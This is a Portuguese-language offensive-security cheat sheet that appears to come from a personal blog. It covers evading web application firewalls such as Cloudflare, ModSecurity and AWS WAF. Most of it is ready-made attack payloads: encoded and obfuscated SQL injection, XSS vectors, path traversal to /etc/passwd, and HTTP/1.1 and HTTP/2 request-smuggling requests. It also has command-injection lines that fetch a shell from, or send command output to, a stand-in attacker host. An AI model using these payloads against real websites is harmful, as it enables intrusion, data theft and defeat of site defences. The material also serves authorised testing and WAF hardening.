Kaique Mitsuo Silva Yamamoto
Seguranca informacao

WAF Bypass: evasão de firewalls de aplicações web

Técnicas de bypass de WAF (ModSecurity, Cloudflare, AWS WAF), encoding, obfuscation, HTTP request smuggling, HTTP/2 desync.

WAFs (Web Application Firewalls) bloqueiam payloads maliciosos — mas são bypassáveis. Cada WAF tem fraquezas específicas, e técnicas genéricas de encoding/obfuscation funcionam contra a maioria.

WAF Detection

# wafw00f (auto-detect)
wafw00f https://target.com

# Headers comuns de WAF
# Cloudflare: cf-ray, server: cloudflare
# AWS WAF: x-amzn-waf-action
# Akamai: Server: AkamaiGHost
# Imperva: X-Iinfo, X-CDN
# Sucuri: X-Sucuri-ID, Server: Sucuri/Cloudproxy
# ModSecurity: Possível em headers de erro
# Barracuda: barra_counter, BNI__barracudaLB

# Nmap
nmap --script http-waf-detect -p 80,443 target.com
nmap --script http-waf-fingerprint -p 80,443 target.com

Encoding Bypass

URL Encoding

# Single encoding
%27%20OR%201%3D1--  → ' OR 1=1--

# Double encoding
%2527%2520OR%25201%253D1--  → ' OR 1=1--

# Unicode encoding
%u0027%u0020OR%u00201%u003D1--
%u02BC (apostrophe unicode variant)

# Invalid percent encoding
%27%20OR%201%3D1--
%u0027%20OR%201%3D1--
%c0%27 (overlong UTF-8)
%ef%bc%27 (fullwidth apostrophe)

# Null byte
%00' OR 1=1--

Case mixing

-- SQL
SeLeCt * FrOm users
/*!50000*/ /*!SeLeCt*/ /*!50000*/ /*!FrOm*/ users

-- XSS
<ScRiPt>alert(1)</ScRiPt>
<SCRIPT>alert`1`</SCRIPT>

-- Command injection
;WgEt http://attacker.com/shell
;cUrL http://attacker.com/$(id)

Comment injection

-- SQL
SEL/**/ECT * FR/**/OM users
SEL%2F**%2FECT * FR%2F**%2FOM users
SEL/*!ECT*/ * FR/*!OM*/ users
SEL/*!50000ECT*/ * FR/*!50000OM*/ users
SEL%0AECT * FR%0AOM users  (newline)

-- XSS
<scr<!-- -->ipt>alert(1)</scr<!-- -->ipt>
<scr%00ipt>alert(1)</scr%00ipt>

String concatenation

-- SQL
CONCAT('SE', 'LEC', 'T')
CONCAT(CHAR(83), CHAR(69), CHAR(76), CHAR(69), CHAR(67), CHAR(84))

-- PHP
${_GET}{'cmd'} (variable functions)
''.`${_GET[0]}`  (template literal concatenation)

-- JavaScript
ale + rt + (1)
window['ale' + 'rt'](1)

HTTP Request Smuggling

CL.TE (Content-Length + Transfer-Encoding)

POST / HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Transfer-Encoding: chunked

0

G

TE.CL (Transfer-Encoding + Content-Length)

POST / HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
Transfer-Encoding: chunked

8
PAYLOAD
0

HTTP/2 Request Smuggling

# HTTP/2 → HTTP/1.1 conversion
:method POST
:path /login
:authority target.com
content-type application/x-www-form-urlencoded
content-length 0

GET /admin HTTP/1.1
Host: target.com

Ferramentas

# HTTP Request Smuggler (Burp extension)
# Automatiza detecção de CL.TE e TE.CL

# smuggler.py
python3 smuggler.py -u https://target.com

# h2csmuggler (HTTP/2)
python3 h2csmuggler.py -x https://target.com -u http://internal-host:8080

HTTP/2 Desync Attacks

# Se frontend (HTTP/2) e backend (HTTP/1.1) discordam em parsing:
# HTTP/2 não tem CRLF, mas HTTP/1.1 tem

# Request via HTTP/2 com header contendo \r\n
# Frontend HTTP/2: vê como um header
# Backend HTTP/1.1: interpreta como dois headers

# Resultado: request smuggling via protocol confusion

Filter Bypass por WAF

Cloudflare

# SQLi bypass
' UNION/**/SELECT/**/1,2,3--
' /*!50000UNION*/ /*!50000SELECT*/ 1,2,3--
' u%6Eion s%65lect 1,2,3--  (hex encoding de palavras)
' UNION(SELECT(1),2,3)--  (parênteses extra)
' AND 1=2 UNION SELECT 1,2,3 FROM users--

# XSS bypass
<img/src=x onerror=alert(1)>
<svg/onload=alert(1)>
<body/onload=alert(1)>
<details/open/ontoggle=alert(1)>
<img src=x onerror=eval(atob('YWxlcnQoMSk='))>

# LFI bypass
....//....//etc/passwd
....\/....\/etc/passwd
%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%252f..%252fetc/passwd

ModSecurity (OWASP CRS)

# SQLi
' UNION ALL SELECT 1,2,3--
' /**/UNION/**/SELECT/**/1,2,3--
' +UNION+SELECT+1,2,3--
' /*!50000UNION*/ /*!50000SELECT*/ 1,2,3--

# XSS
<img src=x onerror=&#97;lert(1)>
<img src=x onerror=eval.call(null,'al'+'ert(1)')>

# Bypass de rule parcial
# ModSecurity CRS usa regexes → encontrar gaps na regex
# Testar payloads incrementalmente

AWS WAF

# AWS WAF é baseado em regras gerenciadas
# Bypass com encoding + alternância de case

# Request body → JSON
# Se WAF inspeciona body mas não JSON aninhado:
{"data": {"query": "' OR 1=1--"}}

# Multi-part form
# Se WAF não parseia multipart corretamente:
------WebKitFormBoundary
Content-Disposition: form-data; name="search"

' OR 1=1--
------WebKitFormBoundary

Generic WAF Bypass Techniques

1. Encoding
   → URL encode, double encode, unicode
   → Hex encoding de caracteres
   → Base64 em parâmetros

2. Case variation
   → uNiOn SeLeCt
   → <ScRiPt>

3. Comment injection
   → SEL/**/ECT
   → <scr<!-- -->ipt>

4. Null bytes
   → %00 antes de payload
   → works em alguns parsers

5. HTTP method change
   → GET → POST, POST → GET
   → PUT, PATCH, DELETE

6. Content-Type variation
   → application/json → application/xml
   → multipart/form-data

7. Header manipulation
   → X-Forwarded-For: 127.0.0.1
   → X-Originating-IP: 127.0.0.1

8. Rate limiting bypass
   → Slow down requests
   → Rotate IPs/proxies

9. Protocol downgrade
   → HTTP/2 → HTTP/1.1
   → WebSocket upgrade

10. Chunked transfer
    → Transfer-Encoding: chunked
    → Divide payload em chunks

Referências

Cryptography para Hackers

Hashing, criptografia simétrica e assimétrica, attacks práticos em implementações fracas, JWT cracking, known plaintext, padding oracle.

Container Security: Docker e Kubernetes

Escape de container, Kubernetes misconfig, pod security, image scanning, supply chain attacks, runtime security — offensive security em ambientes containerizados.

On this page

WAF DetectionEncoding BypassURL EncodingCase mixingComment injectionString concatenationHTTP Request SmugglingCL.TE (Content-Length + Transfer-Encoding)TE.CL (Transfer-Encoding + Content-Length)HTTP/2 Request SmugglingFerramentasHTTP/2 Desync AttacksFilter Bypass por WAFCloudflareModSecurity (OWASP CRS)AWS WAFGeneric WAF Bypass TechniquesReferências